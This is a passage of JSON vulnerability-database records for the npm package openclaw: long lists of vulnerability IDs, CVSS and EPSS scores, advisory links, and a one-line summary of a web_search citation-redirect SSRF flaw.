p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-
tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-
y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["CVE-2026-31997","GHSA-q399-23r3-hfx4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pcea-jxne-vygc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50495?format=json","vulnerability_id":"VCID-rwgg-8hg2-5kd6","summary":"OpenClaw has web_search citation redirect SSRF via private-network-allowing policy\nGemini `web_search` citation redirect resolution used a private-network-allowing SSRF policy. 
A citation URL redirect could target loopback/private/internal destinations and be fetched by the gateway.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31989","reference_id":"","reference_type":"","scores":[{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19595","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19638","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19643","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31989"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T13:38:55Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-web-search-citation-redirect"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31989","reference_id":"CVE-2026-31989","reference_type":"","scores":[{"value":"8.7","scoring_system
":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31989"},{"reference_url":"https://github.com/advisories/GHSA-g99v-8hwm-g76g","reference_id":"GHSA-g99v-8hwm-g76g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g99v-8hwm-g76g"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g","reference_id":"GHSA-g99v-8hwm-g76g","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T13:38:55Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g99v-8hwm-g76g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulner
ability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulner
ability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulner
ability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulner
ability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulner
ability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulner
ability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulner
ability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VC